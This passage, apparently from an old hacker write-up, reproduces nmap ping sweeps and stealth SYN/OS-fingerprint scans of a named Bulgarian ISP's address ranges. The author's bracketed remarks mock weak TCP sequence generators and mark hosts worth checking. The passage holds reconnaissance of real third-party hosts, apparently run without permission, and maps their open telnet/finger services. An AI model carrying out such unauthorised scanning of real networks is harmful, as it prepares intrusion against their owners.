Host www1.infotel.bg (212.39.65.196) appears to be up.
Host hdesk.gurko.cits.btc.bg (212.39.65.197) appears to be up.

 <[ The only machine in the btc.bg domain ... ]>

Host unnamed.infotel.bg (212.39.65.198) appears to be up.
Host ibm2210.infotel.bg (212.39.65.199) appears to be up.
Host  (212.39.65.200) appears to be down.
Host  (212.39.65.207) appears to be down.
Host   (212.39.65.207) seems to be a subnet broadcast address (returned 5 extra pings)

 <[ broadcast again ... ]>

Host  (212.39.65.208) appears to be down.
Host   (212.39.65.208) seems to be a subnet broadcast address (returned 1 extra pings)
Host db.infotel.bg (212.39.65.209) appears to be up.
Host fpn.infotel.bg (212.39.65.210) appears to be up.
Host www1.infotel.bg (212.39.65.211) appears to be up.
Host fw.infotel.bg (212.39.65.212) appears to be up.
Host  (212.39.65.213) appears to be down.
Host  (212.39.65.214) appears to be down.
Host nb.infotel.bg (212.39.65.215) appears to be up.
Host switch.infotel.bg (212.39.65.216) appears to be up.
Host unnamed.infotel.bg (212.39.65.217) appears to be up.
Host  (212.39.65.218) appears to be down.
Host  (212.39.65.219) appears to be down.
Host  (212.39.65.220) appears to be down.
Host br.infotel.bg (212.39.65.221) appears to be up.
Host  (212.39.65.222) appears to be down.
Host  (212.39.65.223) appears to be down.
Host   (212.39.65.223) seems to be a subnet broadcast address (returned 1 extra pings)
Host  (212.39.65.224) appears to be down.
Host  (212.39.65.255) appears to be down.

 <[ The scan is very old and I'm almost sure it is no longer current, but you
 can see that this zone has servers and routers fit for a very large ISP...
 And the next section will show exactly how large... Let me not forget to add
 that the scan was done in the dead of night (around 4:00 am) ]>


     1.3. nmap -sS -O (operating systems in use), better-known facts
          about the specific network-oriented OSes.

 <[ Well, here I scanned with 2.01, because it has OS scan .. ]>

Starting nmap V. 2.01 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Host unnamed.infotel.bg (212.39.64.0) appears to be down, skipping it.

 <[ Here again I have trimmed the hosts that are down ]>

Host unnamed.infotel.bg (212.39.64.16) appears to be down, skipping it.
Host  unnamed.infotel.bg (212.39.64.16) seems to be a subnet broadcast address (returned 1 extra pings).  Skipping host.
Host unnamed.infotel.bg (212.39.64.17) appears to be down, skipping it.
Host ns.infotel.bg (212.39.64.18) appears to be up ... good.
Initiating SYN half-open stealth scan against ns.infotel.bg (212.39.64.18)
Adding TCP port 9 (state Open).
Adding TCP port 13 (state Open).
Adding TCP port 53 (state Open).
Adding TCP port 25 (state Open).
Adding TCP port 7 (state Open).
Adding TCP port 23 (state Open).
Adding TCP port 37 (state Open).
Adding TCP port 19 (state Open).
Adding TCP port 110 (state Open).
The SYN scan took 49 seconds to scan 120 ports.
For OSScan assuming that port 7 is open and port 40836 is closed and neither are firewalled
Interesting ports on ns.infotel.bg (212.39.64.18):
Port    State       Protocol  Service
7       open        tcp        echo
9       open        tcp        discard
13      open        tcp        daytime
19      open        tcp        chargen
21      filtered    tcp        ftp
23      open        tcp        telnet
25      open        tcp        smtp
37      open        tcp        time
49      filtered    tcp        unknown
53      open        tcp        domain
80      filtered    tcp        www
110     open        tcp        pop3
111     filtered    tcp        sunrpc

TCP Sequence Prediction: Class=64K rule
                         Difficulty=1 (Trivial joke)

Sequence numbers: 52871601 52804001 528DEC01 52A17401
Remote operating system guess: AIX 4.1
OS Fingerprint:
TSeq(Class=64K)
T1(Resp=Y%DF=N%W=3F25%ACK=S++%Flags=AS%Ops=M)
T2(Resp=N)
T3(Resp=N)
T4(Resp=Y%DF=N%W=4000%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=15C%RID=E%RIPCK=F%UCK=E%ULEN=134%DAT=E)

 <[ hehe... a little AIX box, and with a very simple TCP sequence number generator at that ]>

Host unnamed.infotel.bg (212.39.64.19) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.20) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.20)
Adding TCP port 23 (state Open).
Adding TCP port 79 (state Open).
The SYN scan took 53 seconds to scan 120 ports.
For OSScan assuming that port 23 is open and port 41396 is closed and neither are firewalled
Interesting ports on unnamed.infotel.bg (212.39.64.20):
Port    State       Protocol  Service
21      filtered    tcp        ftp
23      open        tcp        telnet
49      filtered    tcp        unknown
79      open        tcp        finger
80      filtered    tcp        www
111     filtered    tcp        sunrpc

TCP Sequence Prediction: Class=random positive increments
                         Difficulty=165610 (Good luck!)

Sequence numbers: 193786BC 193CCA3F 193CB80D 193CDC3D 193786BC 193CB80D
Remote operating system guess: Cisco IOS 11.3 - 12.0
OS Fingerprint:
TSeq(Class=RI%gcd=1%SI=286EA)
T1(Resp=Y%DF=N%W=1020%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T3(Resp=Y%DF=N%W=1020%ACK=S++%Flags=AS%Ops=M)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=C0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)

 <[ a little router ..... ]>

Host unnamed.infotel.bg (212.39.64.21) appears to be down, skipping it.
Host tch.infotel.bg (212.39.64.22) appears to be up ... good.
Initiating SYN half-open stealth scan against tch.infotel.bg (212.39.64.22)
Adding TCP port 23 (state Open).
The SYN scan took 79 seconds to scan 120 ports.
For OSScan assuming that port 23 is open and port 30852 is closed and neither are firewalled
Interesting ports on tch.infotel.bg (212.39.64.22):
Port    State       Protocol  Service
21      filtered    tcp        ftp
23      open        tcp        telnet
49      filtered    tcp        unknown
80      filtered    tcp        www
111     filtered    tcp        sunrpc

TCP Sequence Prediction: Class=constant sequence number (!)
                         Difficulty=0 (Trivial joke)

Sequence numbers: 7F 7F 7F 7F 7F 7F
Remote operating system guess: ComOS - Livingston PortMaster (unknown version number)
OS Fingerprint:
TSeq(Class=C%Val=7F)
T1(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T2(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T3(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T4(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=F%UCK=0%ULEN=134%DAT=E)

 <[ Dial-in server .... the bad part is that there is no way to find out the
 number of ports (entry points) ]>

Host c2501.infotel.bg (212.39.64.23) appears to be up ... good.
Initiating SYN half-open stealth scan against c2501.infotel.bg (212.39.64.23)
Adding TCP port 23 (state Open).
Adding TCP port 79 (state Open).
The SYN scan took 72 seconds to scan 120 ports.
For OSScan assuming that port 23 is open and port 34074 is closed and neither are firewalled
Interesting ports on c2501.infotel.bg (212.39.64.23):
Port    State       Protocol  Service
21      filtered    tcp        ftp
23      open        tcp        telnet
49      filtered    tcp        unknown
79      open        tcp        finger
80      filtered    tcp        www
111     filtered    tcp        sunrpc

TCP Sequence Prediction: Class=random positive increments
                         Difficulty=54438 (Worthy challenge)

Sequence numbers: 8C3BBB63 8C3B9183 8C3C0E3B 8C3E6311 8C3E709A 8C3EF28B
Remote operating system guess: Cisco 25XX/45XX Router or 29XX switch (IOS 11.2)
OS Fingerprint:
TSeq(Class=RI%gcd=1%SI=D4A6)
T1(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T3(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)

 <[ one more router .... ]>

Host acp70.infotel.bg (212.39.64.24) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.25) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.26) appears to be down, skipping it.
Host c2522.infotel.bg (212.39.64.27) appears to be up ... good.
Initiating SYN half-open stealth scan against c2522.infotel.bg (212.39.64.27)
Adding TCP port 23 (state Open).
Adding TCP port 79 (state Open).
The SYN scan took 133 seconds to scan 120 ports.
For OSScan assuming that port 23 is open and port 35085 is closed and neither are firewalled
Interesting ports on c2522.infotel.bg (212.39.64.27):
Port    State       Protocol  Service
21      filtered    tcp        ftp
23      open        tcp        telnet
49      filtered    tcp        unknown
79      open        tcp        finger
80      filtered    tcp        www
111     filtered    tcp        sunrpc

TCP Sequence Prediction: Class=random positive increments
                         Difficulty=47238 (Worthy challenge)

Sequence numbers: 98A2BF85 98A2B041 98A6608B 98A67D6F 98A66F2B 98A68BEF
Remote operating system guess: Cisco 25XX/45XX Router or 29XX switch (IOS 11.2)
OS Fingerprint:
TSeq(Class=RI%gcd=2%SI=B886)
T1(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T3(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)

 <[ And a router again ...]>

Host c2511.infotel.bg (212.39.64.28) appears to be up ... good.
Initiating SYN half-open stealth scan against c2511.infotel.bg (212.39.64.28)
Adding TCP port 23 (state Open).
Adding TCP port 79 (state Open).
The SYN scan took 57 seconds to scan 120 ports.
For OSScan assuming that port 23 is open and port 43591 is closed and neither are firewalled
Interesting ports on c2511.infotel.bg (212.39.64.28):
Port    State       Protocol  Service
21      filtered    tcp        ftp
23      open        tcp        telnet
49      filtered    tcp        unknown
79      open        tcp        finger
80      filtered    tcp        www
111     filtered    tcp        sunrpc

TCP Sequence Prediction: Class=random positive increments
                         Difficulty=46280 (Worthy challenge)

Sequence numbers: A0700F7E A0702555 A0720C52 A0721A9A A071FC99 A07260F2
Remote operating system guess: Cisco 25XX/45XX Router or 29XX switch (IOS 11.2)
OS Fingerprint:
TSeq(Class=RI%gcd=1%SI=B4C8)
T1(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T3(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=N)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)

 <[ and again ]>

Host nb.infotel.bg (212.39.64.29) appears to be up ... good.
Initiating SYN half-open stealth scan against nb.infotel.bg (212.39.64.29)
The SYN scan took 60 seconds to scan 120 ports.
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on nb.infotel.bg (212.39.64.29):
Port    State       Protocol  Service
21      filtered    tcp        ftp
49      filtered    tcp        unknown
80      filtered    tcp        www
111     filtered    tcp        sunrpc

Remote OS guesses: Cisco 7513/3640 Router (IOS 11.2(14)P),  Cisco 25XX/45XX Router or 29XX switch (IOS 11.2),  IBM Stackable Hub
OS Fingerprint:
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
PU(Resp=N)

 <[ And again ..... why, they've got routers like spnet, man... and this was
 about a year ago ]>

Host unnamed.infotel.bg (212.39.64.30) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.31) appears to be down, skipping it.
Host  unnamed.infotel.bg (212.39.64.31) seems to be a subnet broadcast address (returned 2 extra pings).  Skipping host.
Host unnamed.infotel.bg (212.39.64.32) appears to be down, skipping it.
Host  unnamed.infotel.bg (212.39.64.32) seems to be a subnet broadcast address (returned 2 extra pings).  Skipping host.
Host unnamed.infotel.bg (212.39.64.33) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.33)
Adding TCP port 23 (state Open).
The SYN scan took 52 seconds to scan 120 ports.
For OSScan assuming that port 23 is open and port 39098 is closed and neither are firewalled
For OSScan assuming that port 23 is open and port 32997 is closed and neither are firewalled
For OSScan assuming that port 23 is open and port 30541 is closed and neither are firewalled
Interesting ports on unnamed.infotel.bg (212.39.64.33):
Port    State       Protocol  Service
21      filtered    tcp        ftp
23      open        tcp        telnet
49      filtered    tcp        unknown
80      filtered    tcp        www
111     filtered    tcp        sunrpc

TCP Sequence Prediction: Class=trivial time dependency
                         Difficulty=4 (Trivial joke)

Sequence numbers: 639C176F 639C1AF3 639C1F0D 639C21C9 639C2647 639C2903
No OS matches for this host.  TCP fingerprints:
TSeq(Class=TD%gcd=32%SI=7)
TSeq(Class=TD%gcd=32%SI=4)
T1(Resp=Y%DF=N%W=800%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
T3(Resp=Y%DF=N%W=800%ACK=S++%Flags=AS%Ops=M)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
T6(Resp=N)
T7(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=54%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=F)

 <[ whoa... this needs to be checked... ]>

Host unnamed.infotel.bg (212.39.64.34) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.34)
Adding TCP port 9 (state Open).
Adding TCP port 79 (state Open).
Adding TCP port 19 (state Open).
Adding TCP port 7 (state Open).
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Adding TCP port 23 (state Open).
Bumping up senddelay by 10000 (to 10000), due to excessive drops
The SYN scan took 247 seconds to scan 120 ports.
For OSScan assuming that port 7 is open and port 36334 is closed and neither are firewalled
Insufficient responses for TCP sequencing (2), OS detection will be MUCH less reliable
For OSScan assuming that port 7 is open and port 36542 is closed and neither are firewalled
For OSScan assuming that port 7 is open and port 31882 is closed and neither are firewalled
Insufficient responses for TCP sequencing (3), OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.64.34):
Port    State       Protocol  Service
7       open        tcp        echo
9       open        tcp        discard
19      open        tcp        chargen
21      filtered    tcp        ftp
23      open        tcp        telnet
49      filtered    tcp        unknown
79      open        tcp        finger
80      filtered    tcp        www
111     filtered    tcp        sunrpc

No OS matches for this host.  TCP fingerprints:
T1(Resp=Y%DF=N%W=860%ACK=S++%Flags=AS%Ops=M)
TSeq(Class=C%Val=68D83FAF)
T1(Resp=Y%DF=N%W=860%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T1(Resp=N)
T2(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
T3(Resp=N)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T3(Resp=N)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T3(Resp=N)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=N)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=N)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=N)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)


Host unnamed.infotel.bg (212.39.64.35) appears to be down, skipping it.
Host  unnamed.infotel.bg (212.39.64.35) seems to be a subnet broadcast address (returned 2 extra pings).  Skipping host.
Host unnamed.infotel.bg (212.39.64.36) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.48) appears to be down, skipping it.
Host  unnamed.infotel.bg (212.39.64.48) seems to be a subnet broadcast address (returned 2 extra pings).  Skipping host.
Host unnamed.infotel.bg (212.39.64.49) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.49)
Adding TCP port 15 (state Open).
Adding TCP port 109 (state Open).
Adding TCP port 9 (state Open).
Adding TCP port 13 (state Open).
Adding TCP port 25 (state Open).
Adding TCP port 7 (state Open).
Adding TCP port 11 (state Open).
Adding TCP port 37 (state Open).
Adding TCP port 23 (state Open).
Adding TCP port 79 (state Open).
Adding TCP port 119 (state Open).
Adding TCP port 19 (state Open).
Adding TCP port 110 (state Open).
Adding TCP port 113 (state Open).
The SYN scan took 59 seconds to scan 120 ports.
For OSScan assuming that port 7 is open and port 43035 is closed and neither are firewalled
WARNING:  RST from port 7 -- is this port really open?
WARNING:  RST from port 7 -- is this port really open?
WARNING:  RST from port 7 -- is this port really open?
WARNING:  RST from port 7 -- is this port really open?
WARNING:  RST from port 7 -- is this port really open?
WARNING:  RST from port 7 -- is this port really open?

 <[ Interesting... is it firewalled in some nasty way? ]>

Insufficient responses for TCP sequencing (0), OS detection will be MUCH less reliable
For OSScan assuming that port 7 is open and port 44543 is closed and neither are firewalled
WARNING:  RST from port 7 -- is this port really open?
WARNING:  RST from port 7 -- is this port really open?
WARNING:  RST from port 7 -- is this port really open?
WARNING:  RST from port 7 -- is this port really open?
WARNING:  RST from port 7 -- is this port really open?
WARNING:  RST from port 7 -- is this port really open?
Insufficient responses for TCP sequencing (0), OS detection will be MUCH less reliable
For OSScan assuming that port 7 is open and port 38888 is closed and neither are firewalled
WARNING:  RST from port 7 -- is this port really open?
WARNING:  RST from port 7 -- is this port really open?
WARNING:  RST from port 7 -- is this port really open?
WARNING:  RST from port 7 -- is this port really open?
WARNING:  RST from port 7 -- is this port really open?
WARNING:  RST from port 7 -- is this port really open?
Insufficient responses for TCP sequencing (0), OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.64.49):
Port    State       Protocol  Service
7       open        tcp        echo
9       open        tcp        discard
11      open        tcp        systat
13      open        tcp        daytime
15      open        tcp        netstat
19      open        tcp        chargen
21      filtered    tcp        ftp
23      open        tcp        telnet
25      open        tcp        smtp
37      open        tcp        time
49      filtered    tcp        unknown
79      open        tcp        finger
80      filtered    tcp        www
109     open        tcp        pop2
110     open        tcp        pop3
111     filtered    tcp        sunrpc
113     open        tcp        auth
119     open        tcp        nntp

No OS matches for this host.  TCP fingerprints:
T1(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T3(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T7(Resp=N)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)


Host unnamed.infotel.bg (212.39.64.50) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.51) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.52) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.53) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.53)
The SYN scan took 62 seconds to scan 120 ports.
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.64.53):
Port    State       Protocol  Service
21      filtered    tcp        ftp
49      filtered    tcp        unknown
80      filtered    tcp        www
111     filtered    tcp        sunrpc

Remote OS guesses: Windows NT4 / Win95 / Win98, Windows NT 5 Beta2
OS Fingerprint:
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=S++%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)

 <[ Wooow, a Windows box left switched on .... (the scan is running in the middle of the night, after all ...) ]>

Host unnamed.infotel.bg (212.39.64.54) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.54)
The SYN scan took 66 seconds to scan 120 ports.
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.64.54):
Port    State       Protocol  Service
21      filtered    tcp        ftp
49      filtered    tcp        unknown
80      filtered    tcp        www
111     filtered    tcp        sunrpc

Remote OS guesses: Windows NT4 / Win95 / Win98, Windows NT 5 Beta2
OS Fingerprint:
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=S++%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)


Host unnamed.infotel.bg (212.39.64.55) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.56) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.57) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.58) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.59) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.59)
The SYN scan took 94 seconds to scan 120 ports.
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.64.59):
Port    State       Protocol  Service
21      filtered    tcp        ftp
49      filtered    tcp        unknown
80      filtered    tcp        www
111     filtered    tcp        sunrpc

Remote OS guesses: Windows NT4 / Win95 / Win98, Windows NT 5 Beta2
OS Fingerprint:
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=S++%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)

 <[ that makes 3 Windows boxes ... :))) ]>

Host unnamed.infotel.bg (212.39.64.60) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.61) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.62) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.63) appears to be down, skipping it.
Host  unnamed.infotel.bg (212.39.64.63) seems to be a subnet broadcast address (returned 1 extra pings).  Skipping host.
Host unnamed.infotel.bg (212.39.64.64) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.97) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.97)
The SYN scan took 13 seconds to scan 120 ports.
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.64.97):
Port    State       Protocol  Service
21      filtered    tcp        ftp
49      filtered    tcp        unknown
80      filtered    tcp        www
111     filtered    tcp        sunrpc

No OS matches for this host.  TCP fingerprints:
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=124%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)


Host unnamed.infotel.bg (212.39.64.98) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.99) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.100) appears to be down, skipping it.
Host  unnamed.infotel.bg (212.39.64.100) seems to be a subnet broadcast address (returned 1 extra pings).  Skipping host.
Host unnamed.infotel.bg (212.39.64.101) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.101)
Adding TCP port 23 (state Open).
Adding TCP port 79 (state Open).
The SYN scan took 13 seconds to scan 120 ports.
For OSScan assuming that port 23 is open and port 38738 is closed and neither are firewalled
For OSScan assuming that port 23 is open and port 42856 is closed and neither are firewalled
Interesting ports on unnamed.infotel.bg (212.39.64.101):
Port    State       Protocol  Service
21      filtered    tcp        ftp
23      open        tcp        telnet
49      filtered    tcp        unknown
79      open        tcp        finger
80      filtered    tcp        www
111     filtered    tcp        sunrpc

TCP Sequence Prediction: Class=random positive increments
                         Difficulty=14515 (Worthy challenge)

Sequence numbers: DF84CA76 DF8E789F DF9892F2 DFA29F68 DFAC9053 DFB6ECB6
Remote operating system guess: Cisco 25XX/45XX Router or 29XX switch (IOS 11.2)
OS Fingerprint:
TSeq(Class=RI%gcd=1%SI=38B3)
T1(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T3(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=N)


Host unnamed.infotel.bg (212.39.64.102) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.102)
The SYN scan took 10 seconds to scan 120 ports.
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.64.102):
Port    State       Protocol  Service
21      filtered    tcp        ftp
49      filtered    tcp        unknown
80      filtered    tcp        www
111     filtered    tcp        sunrpc

No OS matches for this host.  TCP fingerprints:
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=124%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)


Host unnamed.infotel.bg (212.39.64.103) appears to be down, skipping it.
Host  unnamed.infotel.bg (212.39.64.103) seems to be a subnet broadcast address (returned 1 extra pings).  Skipping host.
Host unnamed.infotel.bg (212.39.64.104) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.64.112) appears to be down, skipping it.
Host  unnamed.infotel.bg (212.39.64.112) seems to be a subnet broadcast address (returned 1 extra pings).  Skipping host.
Host unnamed.infotel.bg (212.39.64.113) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.64.113)
The SYN scan took 22 seconds to scan 120 ports.
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.64.113):
Port    State       Protocol  Service
21      filtered    tcp        ftp
